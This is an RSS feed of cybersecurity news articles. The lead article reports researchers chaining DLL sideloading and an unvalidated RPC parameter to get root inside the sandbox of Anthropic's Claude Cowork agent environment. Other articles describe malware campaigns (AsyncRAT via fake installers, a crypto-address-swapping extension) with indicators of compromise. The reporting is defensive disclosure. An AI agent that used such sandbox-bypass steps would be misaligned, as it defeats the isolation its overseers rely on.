<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Cybercriminals &#8211; First Hackers News</title>
	<atom:link href="https://firsthackersnews.com/category/cybercriminals/feed/" rel="self" type="application/rss+xml" />
	<link>https://firsthackersnews.com</link>
	<description>Latest cybersecurity news, real attacks, and practical IOCs—made simple and actionable.</description>
	<lastBuildDate>Thu, 02 Jul 2026 20:36:52 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.9.4</generator>

<image>
	<url>https://firsthackersnews.com/wp-content/uploads/2026/03/cropped-FHN_512x512-32x32.png</url>
	<title>Cybercriminals &#8211; First Hackers News</title>
	<link>https://firsthackersnews.com</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Claude Cowork Sandbox Flaw Allows Root Access</title>
		<link>https://firsthackersnews.com/claude-cowork-sandbox/</link>
					<comments>https://firsthackersnews.com/claude-cowork-sandbox/#respond</comments>
		
		<dc:creator><![CDATA[FHN]]></dc:creator>
		<pubDate>Thu, 02 Jul 2026 20:36:41 +0000</pubDate>
				<category><![CDATA[Application Security]]></category>
		<category><![CDATA[Cyber threat]]></category>
		<category><![CDATA[cyberattack]]></category>
		<category><![CDATA[Cybercriminals]]></category>
		<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Internet Security]]></category>
		<category><![CDATA[malicious cyber actors]]></category>
		<category><![CDATA[Secuirty Update]]></category>
		<category><![CDATA[Security Advisory]]></category>
		<category><![CDATA[vulnerability]]></category>
		<guid isPermaLink="false">https://firsthackersnews.com/?p=11966</guid>

					<description><![CDATA[<p>Security researchers have uncovered a vulnerability chain in Anthropic&#8217;s Claude Cowork Sandbox that allows a local attacker to</p>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/claude-cowork-sandbox/">Claude Cowork Sandbox Flaw Allows Root Access</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Security researchers have uncovered a vulnerability chain in <strong>Anthropic&#8217;s Claude Cowork Sandbox</strong> that allows a local attacker to bypass multiple security protections and execute arbitrary commands as <strong>root</strong> inside the product&#8217;s isolated Linux sandbox.</p>



<p>Although the attack requires local code execution on the host system, the research demonstrates that several built-in security mechanisms can be bypassed, ultimately leading to full administrative control within the sandbox.</p>



<h2 class="wp-block-heading"><strong>How Claude Cowork Protects Its Sandbox</strong></h2>



<p>Claude Cowork Sandbox is designed to help users build applications and automate tasks using Claude Code within an isolated environment.</p>



<p>On Windows, the platform runs workloads inside a <strong>Hyper-V-based Ubuntu virtual machine</strong> protected by several security layers, including:</p>



<ul class="wp-block-list">
<li>Hyper-V isolated Ubuntu VM</li>



<li>Authenticode-based named pipe authentication</li>



<li>Bubblewrap sandbox namespaces</li>



<li>Per-session unprivileged Linux users</li>



<li>Seccomp filtering</li>



<li>Domain-restricted outbound network access</li>
</ul>



<p>These protections are intended to isolate workloads and prevent unauthorized access to the underlying environment.</p>



<h2 class="wp-block-heading"><strong>Researchers Found a Way Around the Protections</strong></h2>



<p>According to research published by <strong>Armadin</strong>, the attack targeted the <strong>CoworkVMService</strong>, a Local System service responsible for managing communication between Windows and the Ubuntu virtual machine.</p>



<p>The service uses a named pipe and validates that only applications digitally signed by <strong>Anthropic</strong> can communicate with it.</p>



<p>Researchers attempted to bypass the signature validation but found that the authentication checks correctly rejected forged signatures and invalid trust chains.</p>



<p>Instead, they identified another attack path.</p>



<h2 class="wp-block-heading"><strong>DLL Sideloading Enabled Code Execution</strong></h2>



<p>Researchers discovered that <strong>claude.exe</strong> loads <strong>USERENV.dll</strong> from its application directory before loading the legitimate Windows system library.</p>



<p>By placing a malicious <strong>USERENV.dll</strong> alongside the application, they successfully performed <strong>DLL sideloading</strong>, allowing arbitrary code to execute inside the trusted Anthropic process.</p>



<p>Because the malicious code was running within the signed application, it successfully passed the service&#8217;s identity verification.</p>



<h2 class="wp-block-heading"><strong>Root Access Achieved Through RPC Manipulation</strong></h2>



<p>After gaining code execution, researchers analyzed the application&#8217;s JSON-based RPC protocol used to communicate with the virtual machine.</p>



<p>The protocol exposed several methods, including:</p>



<ul class="wp-block-list">
<li>configure</li>



<li>startVM</li>



<li>isGuestConnected</li>



<li>spawn</li>
</ul>



<p>While most security controls continued to function correctly, researchers discovered that two parameters—<strong>isResume</strong> and <strong>allowedDomains</strong>—were forwarded directly to the sandbox daemon without sufficient validation.</p>



<p>By fuzzing the RPC interface, they reconstructed the parameter structure and identified a logic flaw.</p>



<p>Normally, setting <strong>isResume</strong> to <strong>false</strong> creates a new unprivileged Linux user.</p>



<p>However, when <strong>isResume</strong> was set to <strong>true</strong>, the existing user validation was skipped entirely.</p>



<p>This allowed researchers to specify any username, including <strong>root</strong>, and execute commands with root privileges inside the sandbox.</p>



<h2 class="wp-block-heading"><strong>Security Impact</strong></h2>



<p>The vulnerability demonstrates that multiple security boundaries can be bypassed once an attacker gains local code execution.</p>



<p>Although Anthropic&#8217;s threat model assumes local access is already required, the research highlights how privilege escalation can occur even inside heavily sandboxed AI environments.</p>



<p>Successful exploitation could allow an attacker to:</p>



<ul class="wp-block-list">
<li>Execute commands as root inside the Linux sandbox.</li>



<li>Bypass intended privilege restrictions.</li>



<li>Gain unrestricted administrative access within the virtual machine.</li>



<li>Circumvent multiple sandbox security controls.</li>
</ul>



<p>The issue was successfully demonstrated against <strong>Claude Desktop for Windows version 1.9255.2.0</strong>.</p>



<p>As AI-powered development environments continue to evolve, this research serves as a reminder that sandbox implementations should be regularly reviewed to ensure privilege boundaries cannot be bypassed through chained vulnerabilities.</p>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/claude-cowork-sandbox/">Claude Cowork Sandbox Flaw Allows Root Access</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://firsthackersnews.com/claude-cowork-sandbox/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Fake Installers Spread AsyncRAT Using ScreenConnect</title>
		<link>https://firsthackersnews.com/asyncrat-screenconnect/</link>
					<comments>https://firsthackersnews.com/asyncrat-screenconnect/#respond</comments>
		
		<dc:creator><![CDATA[FHN]]></dc:creator>
		<pubDate>Thu, 02 Jul 2026 20:21:57 +0000</pubDate>
				<category><![CDATA[Android malware]]></category>
		<category><![CDATA[Cyber threat]]></category>
		<category><![CDATA[cyberattack]]></category>
		<category><![CDATA[Cybercriminals]]></category>
		<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[malicious cyber actors]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[AsyncRAT]]></category>
		<category><![CDATA[cyber attack]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[DLL Sideloading]]></category>
		<category><![CDATA[endpoint security]]></category>
		<category><![CDATA[Fake Installers]]></category>
		<category><![CDATA[kaspersky]]></category>
		<category><![CDATA[malware analysis]]></category>
		<category><![CDATA[malware campaign]]></category>
		<category><![CDATA[powershell]]></category>
		<category><![CDATA[Process Hollowing]]></category>
		<category><![CDATA[RAT]]></category>
		<category><![CDATA[Reflective Loading]]></category>
		<category><![CDATA[remote access]]></category>
		<category><![CDATA[remote access tool]]></category>
		<category><![CDATA[screenconnect]]></category>
		<category><![CDATA[threat intelligence]]></category>
		<category><![CDATA[windows security]]></category>
		<guid isPermaLink="false">https://firsthackersnews.com/?p=11962</guid>

					<description><![CDATA[<p>Cybersecurity researchers have uncovered a large-scale malware campaign in which threat actors are abusing the legitimate ScreenConnect remote</p>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/asyncrat-screenconnect/">Fake Installers Spread AsyncRAT Using ScreenConnect</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Cybersecurity researchers have uncovered a large-scale malware campaign in which threat actors are abusing the legitimate <strong>ScreenConnect</strong> remote access software to deliver <strong>AsyncRAT</strong> through fake software installers.</p>



<p>Instead of relying on traditional malware downloaders, the attackers combine trusted applications, DLL sideloading, reflective loading, and process hollowing to quietly install remote access malware while avoiding detection.</p>



<h2 class="wp-block-heading"><strong>Fake Software Websites Used as Lures</strong></h2>



<p>The attackers created numerous fake download websites designed to imitate popular software applications.</p>



<p>Some of the impersonated software includes:</p>



<ul class="wp-block-list">
<li>OBS Studio</li>



<li>DNS Jumper</li>



<li>DS4Windows</li>



<li>Bandicam</li>



<li>Other widely used freeware applications</li>
</ul>



<p>Many of these websites were translated into more than ten languages, allowing the campaign to target users across multiple regions.</p>



<p>Researchers also found that search engine optimization (SEO) techniques helped these malicious websites appear higher in search results, increasing the likelihood that users would download the infected installers.</p>



<h2 class="wp-block-heading"><strong>How the Infection Works</strong></h2>



<p>Each downloaded archive contains a mix of legitimate and malicious files.</p>



<p>The package typically includes:</p>



<ul class="wp-block-list">
<li>A legitimate Microsoft-signed <strong>install.exe</strong></li>



<li>A malicious <strong>install.res.1033.dll</strong></li>



<li>An <strong>Assets</strong> folder containing the legitimate software</li>



<li>A renamed ScreenConnect MSI installer disguised as a trusted file, such as <strong>vcredist_x64.dll</strong></li>
</ul>



<p>When the user launches the installer, the signed executable automatically loads the malicious DLL through <strong>DLL sideloading</strong>.</p>



<p>The DLL silently installs the ScreenConnect service and registers it under names that appear legitimate, such as <strong>Microsoft Update Service</strong>, before connecting the infected system to attacker-controlled servers.</p>



<h2 class="wp-block-heading"><strong>Multiple Techniques Used to Evade Detection</strong></h2>



<p>Once ScreenConnect is installed, attackers execute PowerShell and VBScript commands to strengthen their foothold on the system.</p>



<p>The scripts perform several actions, including:</p>



<ul class="wp-block-list">
<li>Adding Microsoft Defender exclusions for entire drives and important processes.</li>



<li>Disabling User Account Control (UAC) prompts.</li>



<li>Dropping additional malware components into the <strong>C:\Users\Public</strong> directory.</li>
</ul>



<p>The malware then decrypts an encrypted payload stored in <strong>secret_bytes.txt</strong>. A PowerShell script named <strong>cap.ps1</strong> reconstructs the payload by decoding hexadecimal data, applying XOR decryption, and rebuilding the executable entirely in memory.</p>



<p>The recovered .NET assembly is loaded directly into memory using <strong>reflective loading</strong>, avoiding the need to write the malware to disk.</p>



<h2 class="wp-block-heading"><strong>AsyncRAT Deployed Through Process Hollowing</strong></h2>



<p>To further reduce detection, the malware launches <strong>RegAsm.exe</strong> in a suspended state before replacing its memory with the AsyncRAT payload using <strong>process hollowing</strong>.</p>



<p>Running the malware inside a legitimate Windows process helps it blend in with normal system activity and bypass some security tools that rely on process reputation.</p>



<h2 class="wp-block-heading"><strong>Persistence and Infrastructure</strong></h2>



<p>To maintain long-term access, the attackers create a scheduled task named <strong>MasterPackager.Updater</strong>.</p>



<p>The task runs every <strong>two minutes</strong>, allowing the malware to restart automatically after reboots or if its processes are terminated.</p>



<p>Kaspersky researchers also identified two major infrastructure clusters supporting the campaign.</p>



<p>The operation used:</p>



<ul class="wp-block-list">
<li>Multiple command-and-control (C2) servers</li>



<li>Numerous spoofed domains</li>



<li>Separate download servers for malware archives</li>



<li>ScreenConnect configuration files pointing to attacker infrastructure</li>
</ul>



<p>Based on domain registration data, researchers believe the campaign has been active since <strong>October 2025</strong> and continued operating through <strong>March 2026</strong>, with several fake download websites still accessible online.</p>



<h2 class="wp-block-heading"><strong>Security Recommendations</strong></h2>



<p>Because this campaign abuses trusted software and legitimate administrative tools, organizations should strengthen their defenses against both malware and software supply chain attacks.</p>



<p>Security teams should consider the following measures:</p>



<ul class="wp-block-list">
<li>Download software only from official vendor websites.</li>



<li>Block MSI installers from untrusted locations.</li>



<li>Monitor for newly created Windows services and scheduled tasks.</li>



<li>Detect unusual DLL sideloading activity.</li>



<li>Watch for suspicious use of PowerShell, VBScript, and signed Windows binaries.</li>



<li>Monitor outbound connections to unknown remote management servers.</li>



<li>Keep endpoint protection enabled and regularly updated.</li>



<li>Educate users to verify download sources before installing software.</li>
</ul>



<p>This campaign demonstrates how attackers continue to blend legitimate administration tools with advanced malware techniques. By combining trusted software, stealthy execution methods, and fake software distribution sites, threat actors can significantly increase the chances of compromising both individual users and enterprise environments.</p>



<h2 class="wp-block-heading" id="h-iocs"><strong>IOCs</strong></h2>



<figure class="wp-block-table"><table class="has-fixed-layout"><thead><tr><th class="has-text-align-left" data-align="left">Type</th><th class="has-text-align-left" data-align="left">Indicator</th><th class="has-text-align-left" data-align="left">Description</th></tr></thead><tbody><tr><td>Domain</td><td>mora1987[.]work[.]gd</td><td>AsyncRAT C2 server domain</td></tr><tr><td>URL</td><td>hxxps[:]//fileget.loseyourip[.]com/obs-studio-windows-full/gVOMs5VZ9BtlcaM</td><td>Malicious OBS Studio installer download link</td></tr><tr><td>URL</td><td>hxxps[:]//direct-download.giize[.]com/dns-jumper/iopbsr4hymbo7nfa1q7j</td><td>Malicious DNS Jumper installer download link</td></tr></tbody></table></figure>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/asyncrat-screenconnect/">Fake Installers Spread AsyncRAT Using ScreenConnect</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://firsthackersnews.com/asyncrat-screenconnect/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>CISA Flags SimpleHelp Flaw as Actively Exploited</title>
		<link>https://firsthackersnews.com/simplehelp-vulnerability/</link>
					<comments>https://firsthackersnews.com/simplehelp-vulnerability/#respond</comments>
		
		<dc:creator><![CDATA[FHN]]></dc:creator>
		<pubDate>Wed, 01 Jul 2026 18:02:20 +0000</pubDate>
				<category><![CDATA[CISA]]></category>
		<category><![CDATA[cyberattack]]></category>
		<category><![CDATA[Cybercriminals]]></category>
		<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Exploitation]]></category>
		<category><![CDATA[malicious cyber actors]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[security advisory]]></category>
		<category><![CDATA[security fix]]></category>
		<category><![CDATA[security flaw]]></category>
		<category><![CDATA[security update]]></category>
		<category><![CDATA[security vulnerability]]></category>
		<category><![CDATA[vulnerability impact]]></category>
		<guid isPermaLink="false">https://firsthackersnews.com/?p=11950</guid>

					<description><![CDATA[<p>The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2026-48558, a critical vulnerability affecting SimpleHelp remote support</p>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/simplehelp-vulnerability/">CISA Flags SimpleHelp Flaw as Actively Exploited</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added <strong>CVE-2026-48558</strong>, a critical vulnerability affecting <strong>SimpleHelp</strong> remote support software, to its <strong>Known Exploited Vulnerabilities (KEV)</strong> catalog. The listing confirms that the flaw is being actively exploited, and organizations are urged to apply security updates without delay.</p>



<p>The vulnerability affects environments where <strong>OpenID Connect (OIDC)</strong> authentication is enabled. Due to improper verification of cryptographic signatures, attackers can bypass authentication and gain unauthorized access to affected systems.</p>



<h2 class="wp-block-heading"><strong>How the Vulnerability Works</strong></h2>



<p>According to CISA, the issue occurs because SimpleHelp does not properly validate identity tokens during the OIDC authentication process. As a result, a remote attacker can create forged identity tokens and have them accepted as legitimate.</p>



<p>This allows attackers to impersonate authorized users without valid credentials and gain technician-level access to the application. In some environments, the vulnerability may also allow attackers to bypass multi-factor authentication (MFA), significantly increasing the risk of unauthorized access.</p>



<p>Because SimpleHelp is widely used for remote IT support, successful exploitation could provide attackers with direct access to managed devices, creating opportunities for privilege escalation and lateral movement across enterprise networks.</p>



<h2 class="wp-block-heading"><strong>Immediate Action Required</strong></h2>



<p>CISA has instructed federal agencies to remediate the vulnerability under <strong>Binding Operational Directive (BOD) 26-04</strong>, with a deadline of <strong>July 2, 2026</strong>. The agency also recommends that organizations follow vendor guidance, prioritize patching internet-facing systems, and review affected environments for signs of compromise.</p>



<p>If patches cannot be applied immediately, organizations should consider temporarily removing vulnerable SimpleHelp servers from public access until security updates are in place.</p>



<p>Although CISA has not linked the vulnerability to ransomware attacks, its inclusion in the KEV catalog confirms that threat actors are actively exploiting the flaw. Organizations using SimpleHelp should treat this issue as a high priority and apply the latest security updates as soon as possible to reduce the risk of unauthorized access.</p>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/simplehelp-vulnerability/">CISA Flags SimpleHelp Flaw as Actively Exploited</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://firsthackersnews.com/simplehelp-vulnerability/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Malicious Extension Swaps Crypto Wallet Addresses</title>
		<link>https://firsthackersnews.com/malicious-browser-extension-crypto/</link>
					<comments>https://firsthackersnews.com/malicious-browser-extension-crypto/#respond</comments>
		
		<dc:creator><![CDATA[FHN]]></dc:creator>
		<pubDate>Wed, 01 Jul 2026 17:15:03 +0000</pubDate>
				<category><![CDATA[Cyber threat]]></category>
		<category><![CDATA[Cybercriminals]]></category>
		<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[malicious cyber actors]]></category>
		<category><![CDATA[Security Advisory]]></category>
		<category><![CDATA[Security Update]]></category>
		<category><![CDATA[Bitcoin]]></category>
		<category><![CDATA[Blockchain security]]></category>
		<category><![CDATA[browser extension]]></category>
		<category><![CDATA[Browser Security]]></category>
		<category><![CDATA[chromium]]></category>
		<category><![CDATA[Crypto theft]]></category>
		<category><![CDATA[crypto wallet]]></category>
		<category><![CDATA[cryptocurrency]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[Ethereum]]></category>
		<category><![CDATA[google chrome]]></category>
		<category><![CDATA[malicious browser extension]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[threat intelligence]]></category>
		<guid isPermaLink="false">https://firsthackersnews.com/?p=11944</guid>

					<description><![CDATA[<p>Cybersecurity researchers have uncovered a sophisticated campaign distributing a malicious Chromium-based browser extension that silently replaces cryptocurrency wallet</p>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/malicious-browser-extension-crypto/">Malicious Extension Swaps Crypto Wallet Addresses</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Cybersecurity researchers have uncovered a sophisticated campaign distributing a malicious Chromium-based browser extension that silently replaces cryptocurrency wallet addresses during transactions. Disguised as a lightweight <strong>&#8220;Google Notes&#8221;</strong> extension, the malware is designed to steal digital assets without alerting the victim.</p>



<p>The attack is delivered through unsigned installers written in both <strong>.NET</strong> and <strong>Golang</strong>. Instead of installing the extension through an official browser store, the malware directly modifies Chromium browser files to install the extension and maintain persistence.</p>



<h2 class="wp-block-heading"><strong>How the Attack Works</strong></h2>



<p>Once executed, the installer searches for Chromium-based browsers such as <strong>Google Chrome, Microsoft Edge, Brave</strong>, and other compatible browsers. It terminates running browser processes and modifies the <strong>Preferences</strong> and <strong>Secure Preferences</strong> files to register the malicious extension.</p>



<figure class="wp-block-image size-full"><img fetchpriority="high" decoding="async" width="1024" height="818" src="https://firsthackersnews.com/wp-content/uploads/2026/07/image.png" alt="" class="wp-image-11945" srcset="https://firsthackersnews.com/wp-content/uploads/2026/07/image-177x142.png 177w, https://firsthackersnews.com/wp-content/uploads/2026/07/image-300x240.png 300w, https://firsthackersnews.com/wp-content/uploads/2026/07/image-768x614.png 768w, https://firsthackersnews.com/wp-content/uploads/2026/07/image.png 1024w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Source : McAfee</em></figcaption></figure>



<p>Researchers found that the malware recalculates browser integrity values, allowing the extension to bypass certain security checks on older Chromium versions. On newer versions, the attackers rely on social engineering or developer mode to enable the extension. After installation, the installer removes itself, leaving very few traces on the infected system.</p>



<p>Unlike traditional malware that connects to a hardcoded command-and-control server, the extension uses an <strong>EtherHiding</strong> technique. It queries a public blockchain RPC endpoint and retrieves an encoded value from a smart contract, which is decoded at runtime to obtain the active backend server. This approach allows attackers to change their infrastructure without updating the malware itself, making detection and takedown more difficult.</p>



<h2 class="wp-block-heading"><strong>Wallet Address Replacement and Detection</strong></h2>



<p>The extension requests broad permissions, including access to websites, browsing history, and clipboard data. It continuously monitors copy-and-paste activity and uses cryptocurrency-specific patterns to identify wallet addresses for multiple blockchains, including:</p>



<ul class="wp-block-list">
<li>Bitcoin (BTC)</li>



<li>Ethereum (ETH)</li>



<li>Bitcoin Cash (BCH)</li>



<li>Ripple (XRP)</li>



<li>Dash (DASH)</li>



<li>Solana (SOL)</li>
</ul>



<p>When a wallet address is copied, the extension sends it to the attacker&#8217;s backend using an embedded API key. The server responds with an attacker-controlled wallet address, which immediately replaces the original address in the clipboard. If the victim pastes the address without verifying it, the cryptocurrency is transferred directly to the attacker&#8217;s wallet.</p>



<p>Researchers also found that the installer contains embedded configuration data, including API keys, extension settings, supported wallet types, and blockchain RPC endpoints. The malicious extension is downloaded separately during installation, allowing attackers to update components without modifying the installer.</p>



<p>The campaign has affected users across multiple regions, with researchers observing a notable concentration of infections in India, suggesting opportunistic targeting of cryptocurrency users rather than a region-specific operation.</p>



<p>To reduce the risk of compromise, users should install browser extensions only from official stores, avoid running unsigned installers, carefully review requested permissions, and always verify the first and last few characters of a cryptocurrency wallet address before completing a transaction. </p>



<p>Security teams should also monitor for unauthorized changes to Chromium <strong>Secure Preferences</strong> files, unexpected browser configuration modifications, and unusual blockchain RPC traffic associated with <strong>EtherHiding</strong> infrastructure.</p>



<h2 class="wp-block-heading"><strong>IOCs</strong></h2>



<figure class="wp-block-table"><table class="has-fixed-layout"><tbody><tr><td><strong>Type</strong>&nbsp;</td><td><strong>Category</strong>&nbsp;</td><td><strong>Value</strong>&nbsp;</td></tr><tr><td>SHA-256&nbsp;</td><td>.NET Installer (BaseZipInstaller)&nbsp;</td><td>2735e12030c195fb5454e4736c51b55b59664b93cae9f4bd5317afcd9c2af0bf&nbsp;053620962047f50a91c6e8d1a6519eccc41fab51473f033086b4d816abe8bcb0&nbsp;&nbsp;</td></tr><tr><td>SHA-256&nbsp;</td><td>Golang-compiled Installer Variant&nbsp;</td><td>11be4c47ff049322de41743f62544cafd32d67e24ad653b7ebedf8ebd63e0962  &nbsp;1432393691b415d0cd4680d9cee73e60896fbe63300d9f0355c96e91817e4b1d  &nbsp;</td></tr><tr><td>URL&nbsp;</td><td>Payload distribution&nbsp;</td><td>hxxps://google-services[.]cc/base[.]zip&nbsp;</td></tr><tr><td>Domain&nbsp;</td><td>Command-and-Control (resolved via smart contract)&nbsp;</td><td>devops-offensive[.]cc&nbsp;Zebregts[.]com&nbsp;</td></tr><tr><td>BTC wallet&nbsp;</td><td>Crypto wallet&nbsp;</td><td>3JvDBvKbS6YYMKjV3R9e9Zfd67f467fNLy&nbsp;1BbhVBxpniuZuAL1gGZnEMdQhmz9JGWpyT&nbsp;3AcPNVh7NyESwX3ECymy3rkdH4Ke2c26Tj&nbsp;1BVTrB47erypG3tevi1U9Fv6BbNUBEiuiX&nbsp;</td></tr><tr><td>Artifact&nbsp;</td><td>Sideload target&nbsp;</td><td>Chromium Secure Preferences file (Chrome, Edge, Brave, Opera profiles)&nbsp;</td></tr><tr><td>Extension files&nbsp;</td><td>manifest.json&nbsp;&nbsp;crypto-patterns.js&nbsp;&nbsp;Interceptor.js&nbsp;&nbsp;content-script.j&nbsp;&nbsp;&nbsp;cache.js&nbsp;&nbsp;&nbsp;domain-resolver.js&nbsp;&nbsp;service-worker.js&nbsp;&nbsp;api-client.js&nbsp;</td><td>ed2599d6a8f30d5eaf14ad7f855aece0acdf7efa4a148eb18e4d9f0d8e2cd90c&nbsp;&nbsp;daf82c67e8e5df6bbd5370172ac9374aa7dce48af05496e8ec3dba7b602c619b&nbsp;&nbsp;6eb2f07265dd95cacd39dfcf0705786b97f3e173cf4e9b3dfe7bad141c9a9dd5&nbsp;&nbsp;a2ffdbedc5c9f5400a2b1cf5d35f5ec1df06a74d0345f1035bcf75d36ed73e01&nbsp;&nbsp;&nbsp;eb84ba4a0cd95655a021865d4fec93ae3393f86cc9848810ed0b49035b1c5e2c&nbsp;&nbsp;6aaba685669d779ef8be8f7f4231096cfafd0ef386f3897c5e2106c177724fc8&nbsp;&nbsp;&nbsp;2599064901308a97540af29197ed0b38702bbee38d6dbbfa61cf9eb5878353f3&nbsp;&nbsp;ab450927b37e1b68e2be68832c354ac600e86e2545a904d4ca0ea283f2600cc2&nbsp;&nbsp;&nbsp;</td></tr></tbody></table></figure>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/malicious-browser-extension-crypto/">Malicious Extension Swaps Crypto Wallet Addresses</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://firsthackersnews.com/malicious-browser-extension-crypto/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>WhatsApp Introduces Usernames for Private Messaging</title>
		<link>https://firsthackersnews.com/whatsapp-usernames/</link>
					<comments>https://firsthackersnews.com/whatsapp-usernames/#respond</comments>
		
		<dc:creator><![CDATA[FHN]]></dc:creator>
		<pubDate>Mon, 29 Jun 2026 22:17:34 +0000</pubDate>
				<category><![CDATA[Cyber threat]]></category>
		<category><![CDATA[cyberattack]]></category>
		<category><![CDATA[Cybercriminals]]></category>
		<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[malicious cyber actors]]></category>
		<category><![CDATA[Security Advisory]]></category>
		<category><![CDATA[Security Update]]></category>
		<category><![CDATA[Chat Security]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[Digital Privacy]]></category>
		<category><![CDATA[Messaging]]></category>
		<category><![CDATA[Meta]]></category>
		<category><![CDATA[mobile security]]></category>
		<category><![CDATA[Online Privacy]]></category>
		<category><![CDATA[privacy]]></category>
		<category><![CDATA[Privacy Features]]></category>
		<category><![CDATA[Secure Messaging]]></category>
		<category><![CDATA[social media]]></category>
		<category><![CDATA[Technology News]]></category>
		<category><![CDATA[whatsapp]]></category>
		<category><![CDATA[WhatsApp Usernames]]></category>
		<guid isPermaLink="false">https://firsthackersnews.com/?p=11937</guid>

					<description><![CDATA[<p>WhatsApp has introduced a new username feature designed to improve user privacy by allowing people to communicate without</p>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/whatsapp-usernames/">WhatsApp Introduces Usernames for Private Messaging</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>WhatsApp has introduced a new username feature designed to improve user privacy by allowing people to communicate without sharing their phone numbers. The update marks one of the platform&#8217;s most significant privacy enhancements, giving users greater control over how they connect with others.</p>



<p>Instead of exchanging phone numbers, users will be able to share a unique username when starting new conversations. This feature is especially useful when joining community groups, networking at events, or interacting with people for the first time.</p>



<p>The rollout is being introduced in phases, with users able to reserve their preferred usernames before the feature becomes widely available.</p>



<h2 class="wp-block-heading"><strong>How the Username Feature Works</strong></h2>



<p>Once the feature is enabled, new contacts will only see a user&#8217;s username instead of their phone number. Existing chats and contacts will continue to function normally, and users who prefer sharing phone numbers can continue using WhatsApp as they always have.</p>



<p>To prevent impersonation and abuse, WhatsApp has introduced several rules for creating usernames:</p>



<ul class="wp-block-list">
<li>Usernames must be <strong>3–35 characters</strong> long.</li>



<li>Only lowercase letters, numbers, periods, and underscores are allowed.</li>



<li>Every username must include at least one letter.</li>



<li>Usernames that resemble website domains, such as <strong>.com</strong> or <strong>.in</strong>, are not permitted.</li>



<li>Each username must be unique, and users can choose to match their existing Instagram or Facebook handle for consistent branding.</li>
</ul>



<p>WhatsApp has also added an optional <strong>username key</strong>, a four-digit PIN-like code that provides an additional layer of privacy. New contacts must enter this code before they can send a message, helping reduce spam and unwanted conversations. Existing contacts are not affected by this requirement.</p>



<h2 class="wp-block-heading"><strong>Improved Privacy and User Protection</strong></h2>



<p>Unlike many social media platforms, WhatsApp usernames are not searchable through a public directory. Users cannot browse or discover other usernames unless they already know the exact handle, significantly reducing unsolicited messages and unwanted contact.</p>



<p>The feature is available across Android, iOS, Windows, and WhatsApp Web as the rollout expands globally. Users can reserve a username by navigating to <strong>Settings → Account → Username</strong> on the latest version of the app. WhatsApp also provides username suggestions if a preferred handle has already been taken.</p>



<p>The new system is particularly beneficial for creators, businesses, and organizations, allowing them to use the same username across WhatsApp, Instagram, and Facebook for a consistent online identity.</p>



<p>By moving from phone number-based communication to username-based messaging, WhatsApp is strengthening user privacy while reducing unnecessary exposure of personal contact information. The update also brings the platform closer to privacy-focused messaging services that have long supported handle-based communication.</p>



<p></p>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/whatsapp-usernames/">WhatsApp Introduces Usernames for Private Messaging</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://firsthackersnews.com/whatsapp-usernames/feed/</wfw:commentRss>
